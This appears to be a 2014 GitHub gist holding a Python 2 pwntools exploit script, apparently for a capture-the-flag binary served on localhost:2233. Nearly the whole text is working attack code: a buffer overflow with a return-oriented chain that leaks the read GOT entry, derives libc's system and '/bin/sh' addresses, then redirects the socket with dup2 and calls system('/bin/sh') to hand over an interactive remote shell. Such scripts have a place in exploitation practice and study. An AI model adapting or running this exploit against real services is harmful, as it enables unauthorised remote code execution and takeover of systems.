@otms61
Created December 21, 2014 09:21
from pwn import *
from pwnlib.tubes.remote import remote
from struct import pack, unpack
from time import sleep
def main():
    """Connect to the service on localhost:2233 and drive it with two hard-coded payloads.

    Every address and offset used here is a literal tied to one specific binary
    and libc build (see the disassembly comments below), so the script is not
    portable: a different build, load layout or toolchain invalidates all of
    them.  Python 2 only: it uses print statements and str payloads.
    """
    t = remote('localhost', 2233, timeout=1000)
    # 0x80487c0 <read@plt>: jmp DWORD PTR ds:0x804c010
    read_got = 0x804c010
    send_plt = 0x8048a20 # 08048a20 <send@plt>
    # 000db460 <__read>
    # 00040100 <__libc_system>
    # .data = 0x804c0c0
    # use data 0x804c7c0
    ret = 0x804877f
    popret = 0x8048796
    pop2ret = 0x8048d93
    pop3ret = 0x804926b
    pop4ret = 0x804a7dc
    leaveret = 0x8048a89
    # NOTE(review): p1 is built as ASCII hex text, whereas p2 below is raw
    # packed bytes -- presumably the service decodes the first stage itself;
    # confirm against the target before relying on it.
    p1 = ''
    p1 += 'a'*72
    p1 += '938d0408' # pop2ret 0x8048d93
    p1 += 'a'*8
    p1 += '08d00408' # 0x0804d008 hash list address
    p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #4
    p1 += '10c00408' #read_got
    p1 += '04000000' #4
    p1 += '00000000' #0
    p1 += 'c0870408' #read@plt
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #fd
    p1 += 'c0c70408' #.data
    p1 += '00040000' #size
    p1 += 'c0c70408' #.data
    p1 += '898a0408' #leave, ret;
    p1 += '\r\n' # end
    t.send(p1)
    sleep(1)
    # The 4 bytes received back are interpreted as a little-endian address.
    read_addr = unpack('<I', t.recv(4))[0]
    # Offsets below match the __read / __libc_system values in the header
    # comments; the derived addresses are only correct if the remote libc is
    # exactly that build.
    libc_base = read_addr - 0x0db460
    system_addr = libc_base + 0x40100
    binsh_addr = libc_base + 0x1612c4
    dup2_addr = libc_base + 0xdbe20 # 000dbe20 <__dup2>:
    print "[*] read address: %s" % hex(read_addr)
    print "[*] system address: %s" % hex(system_addr)
    print "[*] binsh address: %s" % hex(binsh_addr)
    p2 = ''
    p2 += pack('<I', 0xdeadbeaf) # .data
    p2 += pack('<I', dup2_addr) # dup2(4,0)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 0)
    p2 += pack('<I', dup2_addr) # dup2(4,1)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 1)
    p2 += pack('<I', dup2_addr) # dup2(4,2)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', 2)
    p2 += pack('<I', system_addr) #system('/bin/sh')
    p2 += pack('<I', 0xdeadbeaf)
    p2 += pack('<I', binsh_addr)
    t.send(p2+'\n')
    # Hands the connection over to the terminal until the session ends.
    t.interactive()
    t.close()
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()